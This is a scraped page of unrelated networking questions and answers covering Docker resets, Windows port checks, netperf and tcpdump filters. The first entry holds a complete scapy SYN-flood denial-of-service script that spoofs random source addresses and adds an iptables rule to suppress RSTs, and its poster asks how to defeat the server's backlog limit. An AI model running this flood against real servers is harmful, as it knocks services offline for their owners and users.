Develop Reference

Ubuntu server limits to 5 SYN_RECV

For a school project I'm trying to do a DOS on an Ubuntu server (18.04) using Ubuntu desktop 18.04 with scapy. They are both placed as VM on VirtualBox.
On server side I have a python SimpleHTTPServer on port 80 that is pingable and reachable via browser by the desktop machine.
I'm trying to DoSing it using this code:
#!/usr/bin/env python
import socket, random, sys
from scapy.all import *
def sendSYN(target, port):
#creating packet
# insert IP header fields
tcp = TCP()
ip = IP()
#set source IP as random valid IP
ip.src = "%i.%i.%i.%i" % (random.randint(1,254), random.randint(1,254), random.randint(1,254), random.randint(1,254))
ip.dst = target
# insert TCP header fields
tcp = TCP()
#set source port as random valid port
tcp.sport = random.randint(1,65535)
tcp.dport = port
#set SYN flag
tcp.flags = 'S'
send(ip/tcp)
return ;
#control arguments
if len(sys.argv) != 3:
print("Few argument: %s miss IP or miss PORT" % sys.argv[0])
sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2])
count = 0
print("Launch SYNFLOOD attack at %s:%i with SYN packets." % (target, port))
while 1:
#call SYNFlood attack
sendSYN(target,port)
count += 1
print("Total packets sent: %i" % count)
print("==========================================")
that basically sends an infinite number of SYN requests to the target machine on the user specified port. Its usage is: sudo python pythonDOS.py <target IP> <target port>.
Before launching this I do sudo iptables -A OUTPUT -p tcp -s <attacker IP> RST RST -j DROP on the attacking machine, to prevent the kernel to send RST request.
The attack seems to work: on wireshark on the attacker machine I can see that packets are sent correctly, but the server doesn't go down.
Running a netstat -antp | grep 80 on the target server I obtain this output:
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 192.168.1.51:80 35.206.32.111:50544 SYN_RECV -
tcp 0 0 192.168.1.51:80 138.221.76.4:24171 SYN_RECV -
tcp 0 0 192.168.1.51:80 164.253.235.187:64186 SYN_RECV -
tcp 0 0 192.168.1.51:80 55.107.244.119:17977 SYN_RECV -
tcp 0 0 192.168.1.51:80 85.158.134.238:37513 SYN_RECV -
and if I rerun the command after few seconds:
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 192.168.1.51:80 100.58.218.121:10306 SYN_RECV -
tcp 0 0 192.168.1.51:80 35.206.32.111:50544 SYN_RECV -
tcp 0 0 192.168.1.51:80 47.206.177.213:39759 SYN_RECV -
tcp 0 0 192.168.1.51:80 55.107.244.119:17977 SYN_RECV -
tcp 0 0 192.168.1.51:80 85.158.134.238:37513 SYN_RECV -
it seems that the server can handle a maximum of 5 SYN_RECV although I'm doing hundreds of these requests with the attacker machine, so I think this is why I can't DOS the server. The ufw is disabled. My objective is to disable or understand what's happening on the server and disable it in order to perform the DOS attack.
Any help is appreciated, thanks in advance.
UPDATE: I installed tshark on the target server and from that I can see that all the packets I'm sending are received on the server, so they are no lost in communication between the two virtual machines. Also running netstat -i I can see that there are no RX_DROP.

Docker - curl returned "connection reset"

I have docker host in a virtual machine.
the host is boot2docker 1.10-rc1.
and a container from a centOS 7.2 image.
I tried to run some application inside the container.
I started the two application and check the network status:
[root#564f3e59142b logs]# netstat -lnput
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:41656 0.0.0.0:* LISTEN 11995/BmtMDProvider
tcp6 0 0 :::44027 :::* LISTEN 4405/java
both application provides some HTTP service.
when I curl both applications (inside the same container) :
the response of java is OK
[root#564f3e59142b logs]# curl 127.0.0.1:44027
curl: (52) Empty reply from server
but on BmtMDProvider I got "connection reset by peer" instantly. This is a HTTP service url and it shouldn't return a "connection reset".
[root#564f3e59142b logs]# curl 127.0.0.1:41656
curl: (56) Recv failure: Connection reset by peer
the BmtMDProvider is some application from third party (I can't modify it) and works normally on a "real" machine.
Could I have some suggestion ,guide or diagnostic steps to find out where the "connection reset" comes from? Thanks.
Edit:
BmtMDProvider is a process spawned by java and it have a random port. the may be multiple instances of BmtMDProvider. java access BmtMDProvider by http (they are in same docker container and java got "connection reset", the same as curl)

Try running your container with IPV4 ports, meaning if you are currently running using
$ docker run -p 41656:41656 BmtMDProvider
run it as
$ docker run -p 127.0.0.1:41656:41656 BmtMDProvider

how to check whether a set of 10,000 consecutive ports are open on my pc at localhost?

All in all i want 10000 open ports at localhost and that too consecutive like 55000 to 65000 for my project .I want to be sure that the set(10,000 consecutive ports) of ports are open .
Here i am describing the three categories of ports:-
The Well Known Ports are those from 0 through 1023.
The Registered Ports are those from 1024 through 49151
The Dynamic and/or Private Ports are those from 49152 through 65535
I want to know some cmd command which will solve my purpose.(i am using windows OS).
My System supports netstat but i want some other command or tool to solve my purpose as i find netstat very time consuming and manual way of checking.
Thanks in advance

Actually, Windows does have a netstat which you can process the output of to look for established sessions:
C:\pax> netstat -na
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 10.6.0.127:54140 143.127.136.95:443 ESTABLISHED
TCP 10.6.0.127:54259 192.168.2.47:32308 ESTABLISHED
TCP 10.6.0.127:54263 192.168.2.47:32308 ESTABLISHED
TCP 10.6.0.127:54274 192.168.2.22:50207 ESTABLISHED
TCP 10.6.0.127:54319 192.168.2.40:5061 ESTABLISHED
But I've finally given up on cmd.exe as a scripting language.
You can also use get-nettcpconnection from within Powershell to get similar information:
PS C:\pax> Get-NetTCPConnection
| format-table -autosize
LocalAddress LocalPort RemoteAddress RemotePort State AppliedSetting
------------ --------- ------------- ---------- ----- --------------
:: 54122 :: 0 Listen
:: 54104 :: 0 Listen
:: 49156 :: 0 Listen
:: 445 :: 0 Listen
:: 135 :: 0 Listen
10.6.0.127 56321 10.4.0.96 445 Established Internet
127.0.0.1 56053 127.0.0.1 8085 TimeWait
127.0.0.1 56052 127.0.0.1 8085 TimeWait
10.6.0.127 56046 192.168.2.13 445 Established Internet
127.0.0.1 56043 127.0.0.1 8085 TimeWait
10.6.0.127 56039 192.168.2.13 49814 Established Internet
10.6.0.127 56038 192.168.2.13 135 TimeWait
10.6.0.127 56035 216.58.220.142 443 Established Internet
: : :
The Powershell way is preferred, at least by intelligent people such as I :-) since it has all these fantastic capabilities for filtering and modifying the data:
PS C:\pax> get-nettcpconnection
| where-object {$_.State -eq 'Established'}
| select-object 'LocalPort'
| sort-object 'LocalPort'
| format-table -autosize
LocalPort
---------
23560
49735
49736
54140
54145
54259
54263
: : :
Any more complex processing (like finding 10,000 consecutive connections) can be done in a PS1 script, similar to how it would have been done with CMD files in the past.

Netperf reporting zero throughput

I've installed netperf 2.6 in two sites and trying to run the netperf benchmark, but All I'm getting is zero Throughput... Does anyone knows how to use netperf properly? (I was following the official documentation)
I run this at a server:
./netserver -p xxxxx
the output is:
Starting netserver with host 'IN(6)ADDR_ANY' port 'xxxxx' and family AF_UNSPEC
In the other side I run:
./netperf -s 5 -H a.b.c.d -p xxxxx
The output is:
MIGRATED TCP STREAM TEST from 0.0.0.0 (0.0.0.0) port 0 AF_INET to a.b.c.d () port 0 AF_INET : demo
Recv Send Send
Socket Socket Message Elapsed
Size Size Size Time Throughput
bytes bytes bytes secs. 10^6bits/sec
87380 16384 16384 10.00 0.00
any ideas?

A netperf test has two "connections." The first is the "control connection" over which information about the test setup and result is exchanged. For the benchmarking itself a "data connection" is used. The control connection will use the control port you've specified with the global "-p" option. The data connection will by default use a port number chosen by the networking stack where the netserver runs.
Both have to be open through firewalls for a test to be successful.
If only the control port is open, you will see the test banners get displayed because the control connection is established. Since the data connection cannot be established, that will report zero.
You can specify an explicit port number for the data connection with a test-specific "-P" option. So, if you opened a second port number, 9992, you would start the netserver as before, and then your netperf command would become:
./netperf -s 5 -H a.b.c.d -p xxxxx -- -P ,9992
That comma is important. The test-specific -P option allows specifying both the local and remote port numbers for the data connection. The remote port number follows a comma.

terminal1:
$ sudo netserver -D -4 -L 0.0.0.0 -p 9991
Starting netserver with host '0.0.0.0' port '9991' and family AF_INET
terminal2:
$ sudo netperf -H 192.168.2.103 -l 60 -t TCP_STREAM
TCP STREAM TEST from 0.0.0.0 (0.0.0.0) port 0 AF_INET to 192.168.2.103 (192.168.2.103) port 0 AF_INET
Recv Send Send
Socket Socket Message Elapsed
Size Size Size Time Throughput
bytes bytes bytes secs. 10^6bits/sec
87380 524288 524288 60.02 89.66

tcpdump to filter ssl packets

I need to filter out all SSL packets using tcpdump. I know that only the first packet can be recognized as being ssl. Is it possible to match against the first packet and then filter out the rest of the SSL stream?

You can filter a tcp stream in tcpdump too, this site explains how to use tcpdump in this way, I hope it helps: tcpdump.org/tcpdump_man.html
You will have to tweak it a bit, but it should work.
Also, there is a dedicated SSL_DUMP utility

Yes, you can. You can follow the commands below to filter the first packet of SSL traffic,
Method 1
[root#arif]# tcpdump -i eth0 src host 192.168.0.2 and dst host 40.113.200.201 and dst port 443 -c 1
Where,
-i : is to mention the interface
src host : is the ip of your localhost
dst host : is the ip of your destination host
dst port : is the destination port where the SSL service is served. You can change the default (443) port according to your configuration.
-c : is used to exit tcpdump after receiving count packets.
-c flag is the main component of your filtering as this flag tells tcpdump to exit after specific packet count. Here, I have used 1 to exit tcpdump after capturing only one (first) packet.
Method 2
The above solution will only work if you initiate tcpdump every time. If you want to filter out the only first packet of each SSL stream then follow the command bellow,
[root#arif]# tcpdump -li eth0 src host 192.168.0.2 and dst host 40.113.200.201 and port 443 and tcp[13] == 2
Where,
l : "Make stdout line buffered. Useful if you want to see the data while capturing it." This will help you to grep/tee/awk the output.
src host dst host : You might ignore these filtering if you don't want to specify source and destination ip.
tcp[13] == 2 In TCP header octate no. 13 is the octate used for setting flags. To set SYN bit 0 0 0 0 0 0 1 0 combination is used (have a look at the diagram bellow) which is decimal 2. So this will help you to filter only the SYN packets which is the first packet of an SSL stream.
|C|E|U|A|P|R|S|F|
|---------------|
|0 0 0 0 0 0 1 0|
|---------------|
So the above configuration should work for most of the scenerio.